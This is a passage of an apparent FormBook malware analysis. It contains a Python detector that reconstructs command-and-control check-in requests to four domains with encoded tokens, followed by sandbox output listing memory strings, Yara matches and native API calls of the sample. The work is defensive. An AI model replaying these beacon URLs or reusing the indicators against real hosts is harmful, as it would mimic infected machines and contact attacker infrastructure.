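    return (f"GET {target} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n"
            f"{extra_headers}\r\n{body}")


REQUESTS = [
    _raw("www.thesaltlifestyle.com",
         "/p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=BBaWJPlPEO+nvtMqhmqrcRgDtKq1LKrnuc6I0tDI+4mn5icveD46W7DXUUudv5GhOCct"),
    _raw("www.aduhelmfinancialsupport.com",
         "/p95n/?oH5h=yIt3vHGcFY19i9LszRbGqv8br4EBNSz7kQseU3pL44UQdgKo/VZu2mbLhFyK51ONzUns&u6ihA=cjlpdRL8ZtfDvB1"),
    _raw("www.scientificimaginetics.com",
         "/p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=gRhj5HMuZvR/Ec7o8oi+HxLziNFcY38IPUSKESyExHr5bx7zEB/jrV73UqEK091YdqI8"),
    _raw("www.johnemotions.com",
         "/p95n/?oH5h=OkCbzDuuF1pG8/+FjCqUEbhCI/Ef9I/I5jzkOiKX/zkELnGsjuBbK/8sh3SawKW3Kze/&u6ihA=cjlpdRL8ZtfDvB1"),
    # Constructed benign request for contrast (not from the report).
    _raw("www.example.com", "/index.html",
         extra_headers="User-Agent: Mozilla/5.0\r\n", body=""),
]


def parse_request(raw):
    """Minimal HTTP/1.1 request parser; query values are kept verbatim
    (urllib.parse would turn '+' into a space and alter the tokens)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    params = [tuple(p.partition("=")[::2]) for p in query.split("&") if p]
    return {"method": method, "path": path, "params": params,
            "headers": headers, "host": headers.get("host", ""), "body": body}


def registrable(host):
    # Simplification: drop a leading 'www.'; a real pipeline would use the PSL.
    return host[4:] if host.lower().startswith("www.") else host


def reasons(req):
    """Indicators tying one request to the extracted configuration."""
    out = []
    if registrable(req["host"]) in CONFIG_DOMAINS:
        out.append("host_in_config")
    if req["path"] == C2_PATH:
        out.append("path_matches_c2_url")
    if "user-agent" not in req["headers"]:
        out.append("no_user_agent")
    if req["method"] == "GET" and req["body"] and set(req["body"]) == {"\x00"}:
        out.append("null_body_on_get")
    return out


def is_checkin(req):
    r = reasons(req)
    return "host_in_config" in r and "path_matches_c2_url" in r


def shared_tokens(reqs):
    """(param, value) pairs reused verbatim across requests to different hosts."""
    hosts = defaultdict(set)
    for req in reqs:
        for key, value in req["params"]:
            hosts[(key, value)].add(req["host"])
    return {kv for kv, h in hosts.items() if len(h) >= 2}


if __name__ == "__main__":
    parsed = [parse_request(r) for r in REQUESTS]
    for req in parsed:
        print(req["host"], is_checkin(req), reasons(req))
    print("shared:", shared_tokens(parsed))
```

The host and path checks depend on having the extracted configuration; the User-Agent, null-body and shared-token checks do not, which is what makes them useful when the same path shows up against hosts that are not yet on a list. The Snort alerts above were raised on the one flow to 165.160.13.20, so the host-level correlation adds coverage the IDS signature did not give for the other three hosts.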
Source: explorer.exe, 00000004.00000000.281618251.000000000F5C4000.00000004.00000001.sdmp; String found in binary or memory: http://crl.;
Source: explorer.exe, 00000004.00000000.281664878.000000000F5E5000.00000004.00000001.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://fontfabrik.com
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.carterandcone.coml
Source: Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com
Source: Po-covid19 2372#w2..exe, 00000000.00000003.226795444.000000000791B000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com-
Source: Po-covid19 2372#w2..exe, 00000000.00000003.227104715.000000000791B000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com.TTF
Source: Po-covid19 2372#w2..exe, 00000000.00000003.225390108.000000000791B000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/
Source: explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers
Source: Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Po-covid19 2372#w2..exe, 00000000.00000003.226977608.0000000007942000.00000004.00000001.sdmp, Po-covid19 2372#w2..exe, 00000000.00000003.226763972.0000000007942000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Po-covid19 2372#w2..exe, 00000000.00000003.226091255.000000000791B000.00000004.00000001.sdmp, Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers8
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers?
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designersG
Source: Po-covid19 2372#w2..exe, 00000000.00000003.227873217.000000000791B000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com0
Source: Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com=
Source: Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.comF&
Source: Po-covid19 2372#w2..exe, 00000000.00000003.225516592.000000000791B000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.comaA
Source: Po-covid19 2372#w2..exe, 00000000.00000003.227873217.000000000791B000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.comalsF
Source: Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.comd
Source: Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.comdZ
Source: Po-covid19 2372#w2..exe, 00000000.00000003.226140808.000000000791B000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.comdic
Source: Po-covid19 2372#w2..exe, 00000000.00000003.227873217.000000000791B000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.comdl
Source: Po-covid19 2372#w2..exe, 00000000.00000003.227873217.000000000791B000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.comeH
Source: Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.comessed
Source: Po-covid19 2372#w2..exe, 00000000.00000003.225516592.000000000791B000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.comessedZ
Source: Po-covid19 2372#w2..exe, 00000000.00000003.225158941.000000000791B000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.comgritoe
Source: Po-covid19 2372#w2..exe, 00000000.00000003.226795444.000000000791B000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.comlic0
Source: Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.comnc./S
Source: Po-covid19 2372#w2..exe, 00000000.00000003.227873217.000000000791B000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.comoitu
Source: Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.comow
Source: Po-covid19 2372#w2..exe, 00000000.00000003.226385689.000000000791B000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.comzana
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.fonts.com
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn
Source: Po-covid19 2372#w2..exe, 00000000.00000003.221689950.0000000007923000.00000004.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn$
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Po-covid19 2372#w2..exe, 00000000.00000003.221689950.0000000007923000.00000004.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn=
Source: Po-covid19 2372#w2..exe, 00000000.00000003.229096001.000000000791B000.00000004.00000001.sdmp, Po-covid19 2372#w2..exe, 00000000.00000003.228852233.000000000791B000.00000004.00000001.sdmp, Po-covid19 2372#w2..exe, 00000000.00000003.228815722.0000000007942000.00000004.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Po-covid19 2372#w2..exe, 00000000.00000003.229096001.000000000791B000.00000004.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmpu
Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.goodfont.co.kr
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmp, Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.223056311.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/-cz
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.222363668.0000000007913000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/.
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/?
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.223056311.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/A
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.222719848.000000000791A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/H
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.223056311.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/S
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0e
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Z
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ghtsl
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.223340232.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/-
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.223340232.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/?
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.223340232.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/H
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.223056311.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/Z
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.222591223.0000000007916000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/~
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.223056311.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/w
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.225451084.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.7
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.223340232.000000000791B000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.227697228.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de.
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.224891432.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de3z
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deXz
          Source: Po-covid19 2372#w2..exe, 00000000.00000003.225055826.000000000791B000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deo
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.262331435.0000000008B22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: msiexec.exe, 0000000E.00000002.622832165.000000000501F000.00000004.00000001.sdmpString found in binary or memory: https://www.johnemotions.com/p95n/?oH5h=OkCbzDuuF1pG8/

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_0041A070 NtClose | 3_2_0041A070
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_0041A120 NtAllocateVirtualMemory | 3_2_0041A120
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_00419F40 NtCreateFile | 3_2_00419F40
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_00419FF0 NtReadFile | 3_2_00419FF0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_0041A072 NtClose | 3_2_0041A072
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_0041A11B NtAllocateVirtualMemory | 3_2_0041A11B
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_00419F3A NtCreateFile | 3_2_00419F3A
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_00419FEA NtReadFile | 3_2_00419FEA
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_01559910 NtAdjustPrivilegesToken, LdrInitializeThunk | 3_2_01559910
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_015599A0 NtCreateSection, LdrInitializeThunk | 3_2_015599A0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_01559840 NtDelayExecution, LdrInitializeThunk | 3_2_01559840
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_01559860 NtQuerySystemInformation, LdrInitializeThunk | 3_2_01559860
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_015598F0 NtReadVirtualMemory, LdrInitializeThunk | 3_2_015598F0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_01559A50 NtCreateFile, LdrInitializeThunk | 3_2_01559A50
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_01559A00 NtProtectVirtualMemory, LdrInitializeThunk | 3_2_01559A00
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_01559A20 NtResumeThread, LdrInitializeThunk | 3_2_01559A20
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_01559540 NtReadFile, LdrInitializeThunk | 3_2_01559540
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_015595D0 NtClose, LdrInitializeThunk | 3_2_015595D0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_01559710 NtQueryInformationToken, LdrInitializeThunk | 3_2_01559710
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_01559780 NtMapViewOfSection, LdrInitializeThunk | 3_2_01559780
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_015597A0 NtUnmapViewOfSection, LdrInitializeThunk | 3_2_015597A0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_01559660 NtAllocateVirtualMemory, LdrInitializeThunk | 3_2_01559660
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_015596E0 NtFreeVirtualMemory, LdrInitializeThunk | 3_2_015596E0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_01559950 NtQueueApcThread | 3_2_01559950
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_015599D0 NtCreateProcessEx | 3_2_015599D0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_0155B040 NtSuspendThread | 3_2_0155B040
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_01559820 NtEnumerateKey | 3_2_01559820
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_015598A0 NtWriteVirtualMemory | 3_2_015598A0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_01559B00 NtSetValueKey | 3_2_01559B00
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_0155A3B0 NtGetContextThread | 3_2_0155A3B0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_01559A10 NtQuerySection | 3_2_01559A10
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_01559A80 NtOpenDirectoryObject | 3_2_01559A80
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_01559560 NtWriteFile | 3_2_01559560
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_0155AD30 NtSetContextThread | 3_2_0155AD30
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_01559520 NtWaitForSingleObject | 3_2_01559520
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_015595F0 NtQueryInformationFile | 3_2_015595F0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_0155A770 NtOpenThread | 3_2_0155A770
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_01559770 NtSetInformationFile | 3_2_01559770
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_01559760 NtOpenProcess | 3_2_01559760
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_0155A710 NtOpenProcessToken | 3_2_0155A710
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_01559730 NtQueryVirtualMemory | 3_2_01559730
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_01559FE0 NtCreateMutant | 3_2_01559FE0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_01559650 NtQueryValueKey | 3_2_01559650
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_01559670 NtQueryInformationProcess | 3_2_01559670
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_01559610 NtEnumerateValueKey | 3_2_01559610
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_015596D0 NtCreateKey | 3_2_015596D0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C9540 NtReadFile, LdrInitializeThunk | 14_2_045C9540
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C95D0 NtClose, LdrInitializeThunk | 14_2_045C95D0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C9650 NtQueryValueKey, LdrInitializeThunk | 14_2_045C9650
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C9660 NtAllocateVirtualMemory, LdrInitializeThunk | 14_2_045C9660
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C96D0 NtCreateKey, LdrInitializeThunk | 14_2_045C96D0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C96E0 NtFreeVirtualMemory, LdrInitializeThunk | 14_2_045C96E0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C9710 NtQueryInformationToken, LdrInitializeThunk | 14_2_045C9710
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C9FE0 NtCreateMutant, LdrInitializeThunk | 14_2_045C9FE0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C9780 NtMapViewOfSection, LdrInitializeThunk | 14_2_045C9780
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C9840 NtDelayExecution, LdrInitializeThunk | 14_2_045C9840
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C9860 NtQuerySystemInformation, LdrInitializeThunk | 14_2_045C9860
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C9910 NtAdjustPrivilegesToken, LdrInitializeThunk | 14_2_045C9910
